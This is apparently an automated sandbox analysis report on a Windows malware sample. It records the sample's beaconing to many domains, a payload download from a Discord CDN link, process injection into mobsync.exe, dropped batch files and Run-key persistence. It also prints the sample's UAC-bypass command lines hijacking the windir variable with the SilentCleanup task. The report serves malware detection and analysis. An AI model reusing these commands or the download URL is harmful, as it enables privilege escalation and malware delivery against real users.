suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.littlekylskap.com/mvc8/?OB=tiKEbzLZZrUKsAwJ/sxTA6yr/f9nTFEDhFQFjdQ20YnCLi2G2MNGDcXIhk6bRdFS+fKrrCI7&nvDHJR=gtxde
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.scoocs.info/mvc8/?nvDHJR=gtxde&OB=QAAzND8Vxj93BCJLH8XgIAd3eRYPUgqMqPVn1TLvnMEe6LHU0Wi+2KqBt2GiAI542eN4rAsy
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.mab.network/mvc8/?OB=eWuQmXzSeweQoYJYQ6yiFuj5EqGrWBSiy/m6AxFgoQUAJO8BYoGzlM7Y1jLdth+BxTnG6yuX&nvDHJR=gtxde
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.firmaheijnen.com/mvc8/?OB=G3ihUkZ6JzrBMvpKoqPcWz2/GlZM0MqsCKXd82wXT8+S+dFScJOu0IUCXrFkQKO8CwDlgHP7&nvDHJR=gtxde
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.asagency.xyz/mvc8/?OB=rT3QEwb/ijRAARunaomLwNnxjKdMqrTAF8F7GGptv7DI/rJ5cOCbvg6zWvjFXKIlbm9DU/tu&nvDHJR=gtxde
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.revelstyle.com/mvc8/?nvDHJR=gtxde&OB=KhHkaqV2pxzYEtxXOZqKnhEwbBa2wcnXm5kmVMDYLytu5SuvIls9x4byPfBUNUaQ6aOXGnQK
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.tokencord.com/mvc8/?OB=BYf0zAKtDQQZsdqaCgtJsqduoKFRddgui11PToTLy7RPVYSaKAlt7QUnj5utdKb5f8Jhp78W&nvDHJR=gtxde
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.staginglaneperf.com/mvc8/?OB=gFRqfEYC92qx40qqTbQRQqjNwW+J09ncvqNZ2WGC03WU9OF5aW6GAl5L4iOP3dH5WKMtam/o&nvDHJR=gtxde
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.naamgem.com/mvc8/?OB=j3Af5XRUezgmydnFoRmHaFlLnKwILO/BWw6n020RcbV14pts70bSI32UY/qTuyhcmPhgBYQQ&nvDHJR=gtxde
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.valentinaturals.com/mvc8/?nvDHJR=gtxde&OB=LFaWDNJJ8LwsB3Cvo+1/dtn/WK8C9mKXRffxxK6Vnpy7GUZK7Vfjv7Ih4ReBgetaAHZPyvaf
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.milda.digital/mvc8/?OB=OJsT9eH3LnjQtOzGcOYPuhYjtx5qQYRTS9x0zNEiZrL4/bWrgoursir8ZWswphyaFe+G5ldc&nvDHJR=gtxde

Performs some HTTP requests (13 events)

request	GET http://www.youandiconsulting.com/mvc8/?nvDHJR=gtxde&OB=EpC5wqvZS9F1/Tmlm5iLNBR8Q8YHzUAaJWzlNDHYOMZZB9lIYTkXOBtDpP8CfT99QMYyBIPx
request	GET http://www.littlekylskap.com/mvc8/?OB=tiKEbzLZZrUKsAwJ/sxTA6yr/f9nTFEDhFQFjdQ20YnCLi2G2MNGDcXIhk6bRdFS+fKrrCI7&nvDHJR=gtxde
request	GET http://www.scoocs.info/mvc8/?nvDHJR=gtxde&OB=QAAzND8Vxj93BCJLH8XgIAd3eRYPUgqMqPVn1TLvnMEe6LHU0Wi+2KqBt2GiAI542eN4rAsy
request	GET http://www.mab.network/mvc8/?OB=eWuQmXzSeweQoYJYQ6yiFuj5EqGrWBSiy/m6AxFgoQUAJO8BYoGzlM7Y1jLdth+BxTnG6yuX&nvDHJR=gtxde
request	GET http://www.firmaheijnen.com/mvc8/?OB=G3ihUkZ6JzrBMvpKoqPcWz2/GlZM0MqsCKXd82wXT8+S+dFScJOu0IUCXrFkQKO8CwDlgHP7&nvDHJR=gtxde
request	GET http://www.asagency.xyz/mvc8/?OB=rT3QEwb/ijRAARunaomLwNnxjKdMqrTAF8F7GGptv7DI/rJ5cOCbvg6zWvjFXKIlbm9DU/tu&nvDHJR=gtxde
request	GET http://www.revelstyle.com/mvc8/?nvDHJR=gtxde&OB=KhHkaqV2pxzYEtxXOZqKnhEwbBa2wcnXm5kmVMDYLytu5SuvIls9x4byPfBUNUaQ6aOXGnQK
request	GET http://www.tokencord.com/mvc8/?OB=BYf0zAKtDQQZsdqaCgtJsqduoKFRddgui11PToTLy7RPVYSaKAlt7QUnj5utdKb5f8Jhp78W&nvDHJR=gtxde
request	GET http://www.staginglaneperf.com/mvc8/?OB=gFRqfEYC92qx40qqTbQRQqjNwW+J09ncvqNZ2WGC03WU9OF5aW6GAl5L4iOP3dH5WKMtam/o&nvDHJR=gtxde
request	GET http://www.naamgem.com/mvc8/?OB=j3Af5XRUezgmydnFoRmHaFlLnKwILO/BWw6n020RcbV14pts70bSI32UY/qTuyhcmPhgBYQQ&nvDHJR=gtxde
request	GET http://www.valentinaturals.com/mvc8/?nvDHJR=gtxde&OB=LFaWDNJJ8LwsB3Cvo+1/dtn/WK8C9mKXRffxxK6Vnpy7GUZK7Vfjv7Ih4ReBgetaAHZPyvaf
request	GET http://www.milda.digital/mvc8/?OB=OJsT9eH3LnjQtOzGcOYPuhYjtx5qQYRTS9x0zNEiZrL4/bWrgoursir8ZWswphyaFe+G5ldc&nvDHJR=gtxde
request	GET https://cdn.discordapp.com/attachments/907771805069115456/907930937109655562/Uxhjrkfgzxoigdcovhkknaxjaqdmkxy

Allocates read-write-execute memory (usually to unpack itself) (44 events)

Time & API	Arguments	Status	Return
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00550000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73b62000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005e3734 process_handle: 0xffffffff		3221225477
NtProtectVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005e3734 process_handle: 0xffffffff		3221225477
NtProtectVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005e3734 process_handle: 0xffffffff		3221225477
NtProtectVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005e3734 process_handle: 0xffffffff		3221225477
NtProtectVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0435562c process_handle: 0xffffffff		3221225477
NtProtectVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0435562c process_handle: 0xffffffff		3221225477
NtProtectVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0435562c process_handle: 0xffffffff		3221225477
NtProtectVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0435562c process_handle: 0xffffffff		3221225477
NtProtectVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0435562c process_handle: 0xffffffff		3221225477
NtProtectVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0435562c process_handle: 0xffffffff		3221225477
NtProtectVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0435562c process_handle: 0xffffffff		3221225477
NtProtectVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0435562c process_handle: 0xffffffff		3221225477
NtProtectVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0435562c process_handle: 0xffffffff		3221225477
NtProtectVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0435562c process_handle: 0xffffffff		3221225477
NtProtectVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0435562c process_handle: 0xffffffff		3221225477
NtProtectVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0435562c process_handle: 0xffffffff		3221225477
NtProtectVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0435562c process_handle: 0xffffffff		3221225477
NtProtectVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0435562c process_handle: 0xffffffff		3221225477
NtProtectVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0435562c process_handle: 0xffffffff		3221225477
NtProtectVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0435562c process_handle: 0xffffffff		3221225477
NtProtectVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0435562c process_handle: 0xffffffff		3221225477
NtProtectVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0435562c process_handle: 0xffffffff		3221225477
NtProtectVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0435562c process_handle: 0xffffffff		3221225477
NtProtectVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0435562c process_handle: 0xffffffff		3221225477
NtProtectVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0435562c process_handle: 0xffffffff		3221225477
NtProtectVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0435562c process_handle: 0xffffffff		3221225477
NtProtectVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0435562c process_handle: 0xffffffff		3221225477
NtProtectVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0435562c process_handle: 0xffffffff		3221225477
NtProtectVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0435562c process_handle: 0xffffffff		3221225477
NtProtectVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0435562c process_handle: 0xffffffff		3221225477
NtProtectVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0435562c process_handle: 0xffffffff		3221225477
NtProtectVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0435562c process_handle: 0xffffffff		3221225477
NtProtectVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0435562c process_handle: 0xffffffff		3221225477
NtProtectVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0435562c process_handle: 0xffffffff		3221225477
NtProtectVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0435562c process_handle: 0xffffffff		3221225477
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2784 region_size: 172032 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0435562c process_handle: 0xffffffff		3221225477
NtProtectVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0435562c process_handle: 0xffffffff		3221225477
NtProtectVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0435562c process_handle: 0xffffffff		3221225477
NtProtectVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0435562c process_handle: 0xffffffff		3221225477
NtProtectVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0435562c process_handle: 0xffffffff		3221225477
NtProtectVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0435562c process_handle: 0xffffffff		3221225477

Creates executable files on the filesystem (5 events)

file	C:\Users\Public\KDECO.bat
file	C:\Users\Public\UKO.bat
file	C:\Users\Public\Uxhjrkfg.exe
file	C:\Users\Public\Trast.bat
file	C:\Users\Public\nest.bat

Creates a suspicious process (2 events)

cmdline	C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
cmdline	schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 81920 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x005d1000 process_handle: 0xffffffff	1	0	0

Yara rule detected in process memory (50 out of 60 events)

description	Create a windows service	rule	Create_Service
description	Communication using DGA	rule	Network_DGA
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Steal credential	rule	local_credential_Steal
description	Communications use DNS	rule	Network_DNS
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over FTP	rule	Network_FTP
description	Escalate priviledges	rule	Escalate_priviledges
description	File Downloader	rule	Network_Downloader
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Create a windows service	rule	Create_Service
description	Communication using DGA	rule	Network_DGA
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Steal credential	rule	local_credential_Steal
description	Communications use DNS	rule	Network_DNS
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over FTP	rule	Network_FTP
description	Escalate priviledges	rule	Escalate_priviledges
description	File Downloader	rule	Network_Downloader
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
cmdline	reg delete hkcu\Environment /v windir /f
cmdline	reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "

One or more of the buffers contains an embedded PE file (1 event)

buffer

Buffer with sha1: e1b13a57767eebf8a985831631cc1a61804ed121

Communicates with host for which no DNS query was performed (1 event)

host

172.67.188.154

Allocates execute permission to another process indicative of possible code injection (3 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2968 region_size: 172032 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000564	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000b0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000564	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000c0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000564	1

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Uxhjrkfg

reg_value

C:\Users\Public\gfkrjhxU.url

Deletes executed files from disk (1 event)

file	C:\Users\Public\UKO.bat

Creates a thread using CreateRemoteThread in a non-child process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2784 created a remote thread in non-child process 2968
CreateRemoteThread Nov. 17, 2021, 7:45 a.m.	thread_identifier: 3004 process_identifier: 2968 function_address: 0x000c0000 flags: 0 stack_size: 0 parameter: 0x000b0000 process_handle: 0x00000564	1	1384	0

Manipulates memory of a non-child process indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2784 manipulating memory of non-child process 2968
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2968 region_size: 172032 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000564	1	0	0
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000b0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000564	1	0	0
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000c0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000564	1	0	0

Potential code injection by writing to the memory of another process (3 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2784 injected into non-child 2968
WriteProcessMemory Nov. 17, 2021, 7:45 a.m.	buffer: HrJr base_address: 0x000b0000 process_identifier: 2968 process_handle: 0x00000564	1	1	0
WriteProcessMemory Nov. 17, 2021, 7:45 a.m.	buffer: UìÄøEUøPUü1ÀPjÿuøÿUüYY]Â@UìÄÔSVWúðEÔG5èÿþÿ3ÀUhP5dÿ0d ÆEÿG<ÇEô»rÃj@h0Eô@PPEô@4ÃPèÔÿÿEð}ðt0hjEðPèËÿÿj@h0Eô@PPEô@4ÃPVè¦ÿÿEð}ðuûtvEÔPÏUðÆèEÔÀt7EèUàUìUøRUØRPEðPVèÿÿjjMèºÐN5Æè_ýÿÿÀtÆEÿ3ÀZYYdhP5EÔG5èäþþÿÃ base_address: 0x000c0000 process_identifier: 2968 process_handle: 0x00000564	1	1	0

Network activity contains more than one unique useragent (2 events)

process	chikwazx.exe				useragent	lVali
process	chikwazx.exe				useragent	aswe

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3008 resumed a thread in remote process 3068
Process injection	Process 192 resumed a thread in remote process 2492
NtResumeThread Nov. 17, 2021, 7:45 a.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 3068	1	0	0
NtResumeThread Nov. 17, 2021, 7:45 a.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 2492	1	0	0

Uses Sysinternals tools in order to add additional command line functionality (1 event)

cmdline

C:\Windows\System32\mobsync.exe

Executed a process and injected code into it, probably while unpacking (17 events)

Time & API	Arguments	Status	Return
NtResumeThread Nov. 17, 2021, 7:45 a.m.	thread_handle: 0x0000013c suspend_count: 1 process_identifier: 2784	1	0
CreateProcessInternalW Nov. 17, 2021, 7:45 a.m.	thread_identifier: 2972 thread_handle: 0x00000560 process_identifier: 2968 current_directory: filepath: track: 1 command_line: C:\Windows\System32\mobsync.exe filepath_r: stack_pivoted: 0 creation_flags: 68 (CREATE_SUSPENDED\|IDLE_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x00000564	1	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2968 region_size: 172032 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000564	1	0
WriteProcessMemory Nov. 17, 2021, 7:45 a.m.	buffer: base_address: 0x72480000 process_identifier: 2968 process_handle: 0x00000564	1	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000b0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000564	1	0
WriteProcessMemory Nov. 17, 2021, 7:45 a.m.	buffer: HrJr base_address: 0x000b0000 process_identifier: 2968 process_handle: 0x00000564	1	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000c0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000564	1	0
WriteProcessMemory Nov. 17, 2021, 7:45 a.m.	buffer: UìÄøEUøPUü1ÀPjÿuøÿUüYY]Â@UìÄÔSVWúðEÔG5èÿþÿ3ÀUhP5dÿ0d ÆEÿG<ÇEô»rÃj@h0Eô@PPEô@4ÃPèÔÿÿEð}ðt0hjEðPèËÿÿj@h0Eô@PPEô@4ÃPVè¦ÿÿEð}ðuûtvEÔPÏUðÆèEÔÀt7EèUàUìUøRUØRPEðPVèÿÿjjMèºÐN5Æè_ýÿÿÀtÆEÿ3ÀZYYdhP5EÔG5èäþþÿÃ base_address: 0x000c0000 process_identifier: 2968 process_handle: 0x00000564	1	1
CreateProcessInternalW Nov. 17, 2021, 7:45 a.m.	thread_identifier: 3012 thread_handle: 0x0000056c process_identifier: 3008 current_directory: C:\Users\Public\ filepath: track: 1 command_line: "C:\Users\Public\Trast.bat" filepath_r: stack_pivoted: 0 creation_flags: 48 (CREATE_NEW_CONSOLE\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x00000570	1	1
CreateProcessInternalW Nov. 17, 2021, 7:45 a.m.	thread_identifier: 2396 thread_handle: 0x0000056c process_identifier: 192 current_directory: C:\Users\Public\ filepath: track: 1 command_line: "C:\Users\Public\nest.bat" filepath_r: stack_pivoted: 0 creation_flags: 48 (CREATE_NEW_CONSOLE\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x00000570	1	1
